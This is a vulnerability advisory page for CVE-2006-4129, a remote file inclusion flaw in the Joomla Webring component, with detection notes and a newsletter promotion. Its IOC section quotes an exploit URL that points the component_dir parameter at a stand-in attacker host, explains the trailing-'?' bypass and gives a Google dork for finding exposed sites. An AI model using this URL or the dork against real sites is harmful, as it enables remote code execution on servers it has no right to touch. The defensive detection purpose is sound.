cbcvebase.
CVE-2006-4129
published 2006-08-14

CVE-2006-4129: PHP remote file inclusion vulnerability in admin.webring.docs.php in the Webring Component (com_webring) 1.0 and earlier for Joomla! allows remote attackers to…

PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.28%
86.9th percentile
PHP remote file inclusion vulnerability in admin.webring.docs.php in the Webring Component (com_webring) 1.0 and earlier for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the component_dir parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
joomlawebring_component

Detection & IOCsextracted from sources · hover to see the quote

path/administrator/components/com_webring/admin.webring.docs.php
urlhttp://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?
filenameadmin.webring.docs.php
  • Look for HTTP requests targeting the component_dir parameter in admin.webring.docs.php with an external URL value, indicating remote file inclusion attempt.
  • The vulnerable code path is require_once($component_dir. "mungdocs.class.php") at line 12 of admin.webring.docs.php — monitor for unsanitized URL-based values passed to this include.
  • Use the Google dork 'inurl:com_webring' to identify exposed vulnerable Joomla installations.
  • ·The exploit URL uses a trailing '?' after the injected URL to nullify the appended filename (mungdocs.class.php), which is a common RFI bypass technique that must be accounted for in detection signatures.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.